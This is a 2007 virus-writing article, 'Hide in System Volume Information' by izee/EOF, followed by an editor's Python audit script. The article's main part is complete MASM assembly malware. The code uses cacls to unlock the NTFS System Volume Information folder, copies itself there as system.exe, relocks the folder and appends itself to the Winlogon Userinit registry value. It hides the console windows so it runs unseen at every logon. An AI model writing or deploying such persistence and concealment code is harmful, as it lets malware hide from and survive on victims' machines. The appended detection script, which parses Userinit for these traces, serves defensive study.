==================================
Hide in System Volume Information
January 13, 2007
by izee/EOF
==================================

1. Intro
2. Explaining
3. Code
4. Exit

=======
1.Intro
=======

This technique shows how we can hide our malware a little better, inside the System Volume Information folder. The idea came to me after reading berniee's article "Explaining the usage of pipes in VX coding", which you can read on berniee's homepage or in rRlf#7, so a big thanx for that! Greetings to Nibble, DiA, and Retro for some beta testing and help. Enjoy ;)

============
2.Explaining
============

The scheme of the technique is very simple. The SVI folder on an NTFS drive is normally accessible only to SYSTEM, so first we use cacls.exe to grant our own account full control on it:

cacls "C:\System Volume Information" /E /G Username:F

(/E edits the existing ACL instead of replacing it, /G grants the user the permission written after the colon, F = full control.) After that we copy ourselves there as system.exe (it can be any other filename) and take the access away again:

cacls "C:\System Volume Information" /E /R Username

(/R revokes the entries of that user.) After those two steps we must set something in a registry startup key. I chose Userinit, you can take any other one. If you choose Userinit too, the Userinit value data must be:

Sysdirpath\Userinit.exe,cacls "C:\System Volume Information" /E /G Username:F,C:\System Volume Information\system.exe

As you see we don't touch "Sysdirpath\Userinit.exe,", it stays in front (Winlogon needs it, without it the logon breaks), we only append our data after it. Winlogon runs the comma separated entries one after another at every logon, so first this command grants us access to the SVI folder again:

cacls "C:\System Volume Information" /E /G Username:F

then our malware runs from the SVI folder and, being the same code, revokes the access again:

C:\System Volume Information\system.exe

If a user then tries to open the SVI folder, he gets "Access is denied". cacls is a console program, so in the code below its window is hidden and its output is sent into a pipe that we never read (this is where berniee's pipe trick comes in), so nothing flashes on the screen.

Two things to keep in mind before the code. Changing the ACL of the SVI folder only works from an account that is allowed to change it, in practice an administrator account. And this technique works only on NTFS formatted drives, not on FAT32: FAT32 has no ACLs at all, so cacls can neither grant nor revoke anything there and the folder is open to everybody anyway.

=======
3. Code
=======

.686
.model flat,stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\advapi32.inc
include \masm32\include\shlwapi.inc
includelib \masm32\lib\advapi32.lib
includelib \masm32\lib\shlwapi.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib

.data
gunbuf        db 32 dup (0)                                   ;user name buffer
gunsize       dd 32d                                          ;its size (in/out parameter of GetUserName)
setprivs      db 'cacls "C:\System Volume Information" /E /R ', 100 dup (0)   ;revoke command, user name appended at runtime
unsetprivs    db 'cacls "C:\System Volume Information" /E /G ', 100 dup (0)   ;grant command, "Username:F" appended at runtime
gmfn_pathbuff db MAX_PATH dup (0)                             ;full path of this exe
pathtodrop    db "C:\System Volume Information\system.exe", 0
dropedexe     db ",C:\System Volume Information\system.exe", 0
fsign         db ':F',0                                       ;full control, goes after the user name in the /G command
regbuf        db 200 dup (0)                                  ;the new Userinit value is built here
userinit      db "\userinit.exe,",0
regkey        db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon',0
regval        db 'Userinit',0
msgtext       db 'Hello from System Volume Information',0
msgtitle      db 'SVI Hide Technique',0

.data?
pipe_r  dd ?
pipe_w  dd ?
regsize dd ?                                                  ;length of the Userinit data incl. the terminating NUL
s_attr  SECURITY_ATTRIBUTES <>
s_info  STARTUPINFO <>
p_info  PROCESS_INFORMATION <>

.code
start:
    invoke GetUserName, addr gunbuf, addr gunsize            ;get the logged-on user name
    invoke lstrcat, addr unsetprivs, addr gunbuf             ;cacls "C:\System Volume Information" /E /G Username
    invoke lstrcat, addr unsetprivs, addr fsign              ;cacls "C:\System Volume Information" /E /G Username:F

    mov s_attr.lpSecurityDescriptor, NULL                    ;default security descriptor
    mov s_attr.bInheritHandle, TRUE                          ;the pipe handles must be inheritable so cacls can use them
    mov s_attr.nLength, sizeof SECURITY_ATTRIBUTES
    invoke CreatePipe, addr pipe_r, addr pipe_w, addr s_attr, NULL   ;NULL = default buffer size
    or eax,eax
    jz exit                                                  ;no pipe, quit

    mov s_info.cb, sizeof STARTUPINFO
    mov eax, pipe_w
    mov s_info.hStdOutput, eax                               ;cacls output goes into the pipe instead of a console
    mov s_info.hStdError, eax
    mov s_info.dwFlags, STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES
    mov s_info.wShowWindow, SW_HIDE                          ;and its console window stays hidden

    ;grant ourselves full control on the SVI folder
    invoke CreateProcess, NULL, addr unsetprivs, NULL, NULL, TRUE, NULL, NULL, NULL, addr s_info, addr p_info
    or eax,eax
    jz exit
    invoke WaitForSingleObject, p_info.hProcess, INFINITE    ;cacls must be finished before we copy; it prints one
                                                             ;line, far below the pipe buffer size, so it can't block
    invoke CloseHandle, p_info.hProcess
    invoke CloseHandle, p_info.hThread

    invoke GetModuleFileName, NULL, addr gmfn_pathbuff, sizeof gmfn_pathbuff   ;full path of this app
    invoke CopyFile, addr gmfn_pathbuff, addr pathtodrop, TRUE                 ;copy it to SVI, don't overwrite an existing one

    ;revoke our access on the SVI folder again
    invoke lstrcat, addr setprivs, addr gunbuf               ;cacls "C:\System Volume Information" /E /R Username
    invoke CreateProcess, NULL, addr setprivs, NULL, NULL, TRUE, NULL, NULL, NULL, addr s_info, addr p_info
    or eax,eax
    jz closepipe
    invoke WaitForSingleObject, p_info.hProcess, INFINITE
    invoke CloseHandle, p_info.hProcess
    invoke CloseHandle, p_info.hThread
closepipe:
    invoke CloseHandle, pipe_w                               ;both cacls runs are done, the pipe is no longer needed
    invoke CloseHandle, pipe_r

    ;build the new Userinit value: Sysdirpath\userinit.exe,cacls ... /E /G Username:F,C:\System Volume Information\system.exe
    invoke GetSystemDirectory, addr regbuf, sizeof regbuf    ;Sysdirpath
    invoke lstrcat, addr regbuf, addr userinit               ;Sysdirpath\userinit.exe,
    invoke lstrcat, addr regbuf, addr unsetprivs             ;...,cacls "C:\System Volume Information" /E /G Username:F
    invoke lstrcat, addr regbuf, addr dropedexe              ;...,C:\System Volume Information\system.exe
    invoke lstrlen, addr regbuf
    inc eax                                                  ;count the terminating NUL too
    mov regsize, eax
    invoke SHSetValue, HKEY_LOCAL_MACHINE, addr regkey, addr regval, REG_SZ, addr regbuf, regsize

    invoke MessageBox, NULL, addr msgtext, addr msgtitle, MB_OK + MB_ICONINFORMATION   ;just for the test after reboot
yourcode:
    ;...
exit:
    invoke ExitProcess, 0                                    ;return to Windows ;)
end start

======
4.Exit
======

I hope you liked the tech. If you have something to say, drop it to: izee.vx@gmail.com

See you!
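Added by the editor, not part of izee's article: the other side of the technique from section 2. The only things it leaves outside the locked folder are the extra entries in the Winlogon Userinit value, so a check of that value finds it. The script below splits the value the way Winlogon does (on commas), expects nothing but Sysdirpath\userinit.exe in it, decodes any cacls command it finds into path, /E, grants and revokes, and flags programs that run from the SVI folder. The sample values and the user name "izee" are constructed for the example; on Windows the main block reads the live value with winreg instead.

```python
# Added example (editor's, not part of izee's article): audit the Winlogon Userinit
# value for the two traces the SVI technique leaves there, the cacls grant command
# and the program started from the SVI folder, and decode that cacls command.
# The sample values and the user name "izee" are constructed for this example.
import os
import re

WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

SAMPLE_CLEAN = r"C:\WINDOWS\system32\userinit.exe,"
SAMPLE_INFECTED = (r"C:\WINDOWS\system32\userinit.exe,"
                   r'cacls "C:\System Volume Information" /E /G izee:F,'
                   r"C:\System Volume Information\system.exe")

_TOKEN_RE = re.compile(r'"[^"]*"|\S+')   # a quoted path or a bare word


def parse_cacls(entry):
    """Decode a cacls command line into path, /E flag, grants and revokes.
    Returns None when the entry is not a cacls invocation."""
    tokens = [t.strip('"') for t in _TOKEN_RE.findall(entry)]
    if not tokens or re.split(r"[\\/]", tokens[0])[-1].lower() not in ("cacls", "cacls.exe"):
        return None
    result = {"path": tokens[1] if len(tokens) > 1 else "", "edit": False,
              "grants": [], "revokes": []}
    i = 2
    while i < len(tokens):
        opt = tokens[i].upper()
        i += 1
        if opt == "/E":
            result["edit"] = True
            continue
        # /G, /P and /R take one or more "user[:perm]" operands, up to the next switch
        operands = []
        while i < len(tokens) and not tokens[i].startswith("/"):
            operands.append(tokens[i])
            i += 1
        if opt in ("/G", "/P"):
            for operand in operands:
                user, _, perm = operand.partition(":")
                result["grants"].append((user, perm.upper()))
        elif opt == "/R":
            result["revokes"].extend(operands)
    return result


def audit_userinit(value, system_dir):
    """Return (kind, entry) findings for a Userinit value.  Winlogon runs the comma
    separated entries in order; only <system_dir>\\userinit.exe belongs there."""
    expected = system_dir.rstrip("\\").lower() + r"\userinit.exe"
    entries = [e.strip() for e in value.split(",") if e.strip()]
    findings = []
    if not entries or entries[0].lower() != expected:
        findings.append(("bad-first-entry", entries[0] if entries else ""))
    for entry in entries[1:]:
        if parse_cacls(entry) is not None:
            findings.append(("acl-change", entry))       # an ACL is edited at every logon
        elif "system volume information" in entry.lower():
            findings.append(("svi-program", entry))      # something runs out of the SVI folder
        else:
            findings.append(("extra-entry", entry))      # anything else that is not userinit.exe
    return findings


if __name__ == "__main__":
    try:
        import winreg                       # Windows: read the live value
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_KEY) as key:
            value, _ = winreg.QueryValueEx(key, "Userinit")
        system_dir = os.path.join(os.environ["SystemRoot"], "system32")
    except ImportError:                     # elsewhere: run on the constructed sample
        value, system_dir = SAMPLE_INFECTED, r"C:\WINDOWS\system32"
    for kind, entry in audit_userinit(value, system_dir) or [("clean", value)]:
        print(kind, entry)
```

On a clean machine the audit returns nothing; on the sample value from the article it reports an acl-change entry (the decoded cacls grant of F to the user on the SVI folder) followed by an svi-program entry for system.exe. Because the check keys on the structure of the value rather than on file names, renaming system.exe or picking another folder name still leaves the cacls entry and the extra program entry to find.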